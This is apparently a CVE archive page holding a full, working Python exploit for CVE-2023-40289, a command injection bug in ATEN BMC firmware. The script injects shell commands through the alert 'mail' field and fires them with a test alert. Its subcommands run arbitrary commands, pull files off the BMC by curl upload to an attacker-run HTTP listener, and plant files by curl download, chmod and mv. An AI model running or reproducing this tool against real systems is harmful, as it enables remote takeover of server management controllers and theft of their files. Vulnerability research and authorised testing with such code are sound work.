4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE_2023_40289.py PY
#!/usr/bin/env python3
"""
Exploit for CVE-2023-40289, a command injection vulnerability in ATEN's BMC firmware.
Based on information and code from https://binarly.io/advisories/BRLY-2023-001/
"""

import queue
import re
import stat
import sys
import threading
import time
import typing as t
from dataclasses import dataclass
from http.server import BaseHTTPRequestHandler, HTTPServer
from pathlib import Path, PurePosixPath

import click
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

@dataclass
class CliArgs:
    target: str
    lhost: str
    lport: int
    delay: int | float


class Handler(BaseHTTPRequestHandler):
    """Simple handler for HTTP requests."""

    def do_GET(self):
        """Handle an HTTP GET request. Simply return static file content."""
        self.send_response(200)  # OK
        self.send_header("Conent-Type", "application/octet-stream")
        self.end_headers()
        self.wfile.write(self.server.static_content)

    def do_POST(self):
        """Handle an HTTP POST request. Store the request body in the server's queue."""
        content_length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(content_length)
        self.send_response(202)  # Accepted
        self.end_headers()
        self.server.q.put(body)

    def log_message(self, *args):
        # Noop method to silence the send_response method.
        pass


def run_http_server(static_content: bytes = b""):
    """Run an HTTP server in a background thread.

    This server only accepts a single request and terminates after handling it.

    Args:
        static_content: Static content to server for GET requests.

    Returns:
        A tuple consisting of the background thread and a Queue from which the content of a
        POST request can be read.

    """
    handler = HTTPServer(("", args.lport), Handler)
    # Attach a queue for communicating data back to the main thread.
    q: queue.Queue[bytes] = queue.Queue()
    handler.q = q
    # Attach some static content to serve to GET requests.
    handler.static_content = static_content

    # Run an HTTP server in a background thread.
    thread = threading.Thread(target=handler.handle_request)
    thread.daemon = True
    thread.start()

    return thread, q


def store_payload(payload: str, index: int = 0):
    """Store the payload command in the target BMC's configuration.

    Args:
        payload: The command to run on the target BMC.
        index: Store the command at this alert index.

    Raises:
        ValueError: The payload is too long.
        RuntimeError: The target did not accept the payload.

    """
    if not payload.startswith(";"):
        payload = f";{payload}"
    if "@" not in payload:
        # The payload is only accepted if it contains an @ somewhere. Prepending an @ does
        # not do any harm, except that it increases the length. So we only do it if
        # necessary.
        payload = f"@{payload}"
    if len(payload) >= 64:
        raise ValueError(
            f"Payload too long ({len(payload)} chars). A maximum of 63 character is allowed. Sorry."
        )
    # End the command. It does not seem to hurt if this brings the payload over the length
    # limit.
    payload += ";:"

    data = {
        "op": "config_alert",
        "destination": "192.168.0.10",
        "severity": "16",
        "mail": payload,
        "sub": "test",
        "msg": "test",
        "index": str(index),
        "fun": "m",
    }
    r = session.post(url, data=data, verify=False)
    if r.status_code != 200:
        raise RuntimeError(
            f"Could not store payload {payload} at index {index}. Target returned {r.status_code} ({r.reason})."
        )


def trigger_exploit(index: int = 0) -> None:
    """Trigger running a previously stored payload command.

    Args:
        index: Trigger the command stored at this alert index.

    Raises:
        RuntimeError: The target BMC returned an unexpected error.

    """
    data = {"op": "send_test_alert", "index": str(index)}
    r = session.post(url, data=data, verify=False)
    if r.status_code != 200:
        raise RuntimeError(
            f"Could not trigger exploit at index {index}. Target returned {r.status_code} ({r.reason})."
        )


def get_file(path: str | PurePosixPath, timeout: int = 15, index: int = 1) -> bytes:
    """Get the file at the given path from the BMC by triggering an upload to a local handler.

    Args:
        path: Absolute path of the file on the target BMC to get.
        timeout: How long to wait for the upload to complete (in seconds).
        index: Store the upload command at this alert index.

    Returns:
        The file's contents.

    Raises:
        RuntimeError: Waiting for the file upload timed out.
    """
    thread, q = run_http_server()

    # Send the file to our HTTP server.
    store_payload(f"curl --data-binary @{path} {handler_url}", index=index)
    time.sleep(0.1)
    trigger_exploit(index=index)

    # Wait for the HTTP server to finish.
    for _ in range(timeout):
        thread.join(1)
        if not thread.is_alive():
            break
    else:
        raise RuntimeError()

    return q.get()


def login(username: str, password: str) -> None:
    """Log in to the target BMC with username and password.

    Args:
        username: Log in as this user.
        password: The password for the given user.

    Raises:
        requests.ConnectionError: Could not connect to the target BMC.
        requests.HTTPError: The target BMC returned an unexpected response.

    """
    r = session.post(
        f"{args.target}/cgi/login.cgi", {"name": username, "pwd": password}, verify=False
    )
    r.raise_for_status()


def set_csrf_token():
    """Get the current CSRF token value and add it to the global session object.

    Raises:
        requests.HTTPError: The target BMC returned an unexpected response.

    """
    r = session.get(f"{args.target}/cgi/url_redirect.cgi?url_name=topmenu", verify=False)
    r.raise_for_status()
    m = re.search(r'SmcCsrfInsert\s*\("CSRF_TOKEN",\s*"([^"]+)"\);', r.text)
    session.headers["Csrf_token"] = m.group(1)


def _disable_password_prompt(ctx: click.Context, param: click.Parameter, value: t.Any) -> t.Any:
    """Disable the interactive prompt for the (missing) --password option.

    Args:
        ctx: The current click Context.
        param: The current click Parameter.
        value: The current click parameter's value.

    Returns:
        The unchanged value.

    """
    if value:
        for p in ctx.command.params:
            if isinstance(p, click.Option) and p.name == "password":
                p.prompt = None
    return value


@click.group(
    context_settings={"auto_envvar_prefix": "BMC"},
    no_args_is_help=True,
    help=r"""Exploit CVE-2023-40289 on BMCs with ATEN firmware.

/!\ Caution! This script will overwrite alerts without prompting! /!\ """,
    epilog="Note: All options may also be given as environment variables with the prefix 'BMC_' (e.g. BMC_TARGET).",
)
@click.option("--target", required=True, help="URL of the target BMC's web UI.")
@click.option(
    "-h",
    "--lhost",
    help="IP address or host name of this system to get payload output. Limited to ~35 characters.",
)
@click.option(
    "-l",
    "--lport",
    default=80,
    type=click.INT,
    help="Local port to run an HTTP server on to get payload output.",
    show_default=True,
)
@click.option(
    "-s",
    "--sid",
    help="A valid session ID for an administrative user on the target system.",
    callback=_disable_password_prompt,
)
@click.option(
    "-u",
    "--username",
    help="The name of an administrative user to log in as. Ignored if --sid is given.",
)
@click.option(
    "-p",
    "--password",
    prompt=True,
    hide_input=True,
    help="The password of the given user.",
)
@click.option(
    "--delay",
    type=click.FLOAT,
    default=1.5,
    show_default=True,
    help="Delay between running a command and retrieving its output.",
)
def cli(target: str, lhost: str, lport: int, sid: str, username: str, password: str, delay: float):
    # Store global CLI arguments for subcommands.
    global args
    args = CliArgs(target, lhost, lport, delay)

    # Set up some basic HTTP connection parameters.
    global url
    url = f"{target}/cgi/op.cgi"
    if sid:
        session.cookies.set("SID", sid)
    elif username and password:
        login(username, password)
    else:
        raise click.UsageError("Session ID or username and password is required.")
    set_csrf_token()
    session.headers["Referer"] = target

    if lhost:
        global handler_url
        # Note: We intentionally omit the URL scheme to save precious payload characters.
        # Curl will figure it out.
        handler_url = lhost
        if lport != 80:
            handler_url = f"{handler_url}:{lport}"


@cli.command(context_settings={"ignore_unknown_options": True})
@click.argument("payload", nargs=-1, type=click.UNPROCESSED)
def run(payload: str):
    """Run the PAYLOAD command on the target BMC. PAYLOAD is limited to ~61 characters."""
    payload = " ".join(payload)

    get_output = False
    if args.lhost is None:
        print("[!] Local host address not given. You will not get the output.", file=sys.stderr)
    elif len(payload) < 53:
        # Looks like the payload is short enough. We'll redirect the output to a file so we
        # can get it later.
        payload += "&>/tmp/x"
        get_output = True
    elif len(payload) < 54:
        # Get stdout only. Better than nothing.
        payload += ">/tmp/x"
        get_output = True
    else:
        # For a long payload, we can't redirect the output, because that would bring the payload
        # over the 63 character length limit.
        print("[!] Payload is too long. You will not get the output.", file=sys.stderr)

    # Run the payload.
    store_payload(payload)
    print("[✓] Set payload command", file=sys.stderr)
    time.sleep(0.1)
    trigger_exploit()
    print("[✓] Triggered payload command", file=sys.stderr)

    # Retrieve the output.
    if get_output:
        time.sleep(args.delay)
        print("[.] Getting command output", file=sys.stderr)
        try:
            output = get_file("/tmp/x")
        except RuntimeError:
            print("[!] Could not get command output.", file=sys.stderr)
        else:
            if output:
                try:
                    # Print the output as text.
                    print(output.decode(), end="")
                except UnicodeDecodeError:
                    # Output is not valid UTF-8. It's probably binary data then. Output it raw.
                    sys.stdout.buffer.write(output)
                    sys.stdout.buffer.flush()


@cli.command()
@click.option(
    "--dest",
    default=Path("."),
    type=click.Path(path_type=Path),
    help="Local destination directory in which to store the file.",
)
@click.option(
    "--flat/--no-flat",
    default=False,
    help="Do not/do replicate the original directory structure in the destination directory.",
)
@click.argument("path", type=click.Path(path_type=PurePosixPath))
def get(path: PurePosixPath, dest: Path, flat: bool) -> int:
    """Get FILE from the target BMC and save it locally."""
    print(f"[.] Triggering upload of {path} from BMC.", file=sys.stderr)
    try:
        content = get_file(path)
    except RuntimeError:
        print("[!] Could not get file.", file=sys.stderr)
        return 1

    if not flat:
        dest = dest / path.parent.relative_to("/")
    dest.mkdir(parents=True, exist_ok=True)
    dest = dest / path.name
    dest.write_bytes(content)
    print(f"[✓] File contents written to {dest}.", file=sys.stderr)
    return 0


@cli.command()
@click.argument("file", type=click.Path(exists=True, dir_okay=False, path_type=Path))
@click.argument("dest", type=click.Path(path_type=PurePosixPath))
def put(file: Path, dest: PurePosixPath) -> int:
    """Write local FILE to the BMC at DEST. Will restore local permissions on the target."""
    content = file.read_bytes()
    mode = stat.S_IMODE(file.stat().st_mode)

    # Download the file from our HTTP server.
    store_payload(f"curl -o /tmp/dl {handler_url} &>/tmp/x", index=0)
    if mode != 0o644:
        store_payload(f"chmod {mode:o} /tmp/dl &>/tmp/x", index=1)
    store_payload(f"mv /tmp/dl {dest} &>/tmp/x", index=2)
    print("[✓] Set download payloads", file=sys.stderr)
    time.sleep(0.1)

    thread, q = run_http_server(content)
    trigger_exploit(index=0)
    # Wait for the HTTP server to finish.
    for _ in range(15):
        thread.join(1)
        if not thread.is_alive():
            break
    else:
        print("[!] BMC did not download file.", file=sys.stderr)
        return 1
    print(f"[✓] Downloaded {file} to BMC.", file=sys.stderr)

    if mode != 0o644:
        trigger_exploit(index=1)
        time.sleep(args.delay)
        try:
            output = get_file("/tmp/x", index=3)
        except RuntimeError:
            print("[!] Could not get command output.", file=sys.stderr)
        else:
            if output:
                print("[!] Could not set file mode.", file=sys.stderr)
                print(output.decode(), end="", file=sys.stderr)
            else:
                print("[✓] Set file mode.", file=sys.stderr)

    trigger_exploit(index=2)
    time.sleep(args.delay)
    try:
        output = get_file("/tmp/x", index=3)
    except RuntimeError:
        print("[!] Could not get command output.", file=sys.stderr)
    else:
        if output:
            print(f"[!] Could not move downloaded file to {dest} on BMC.", file=sys.stderr)
            print(output.decode(), end="", file=sys.stderr)
        else:
            print(f"[✓] Moved downloaded file to {dest} on BMC.", file=sys.stderr)

    return 0


# Define some global variables used throughout this script.
args: CliArgs
url: str
session = requests.Session()
handler_url: str

if __name__ == "__main__":
    cli()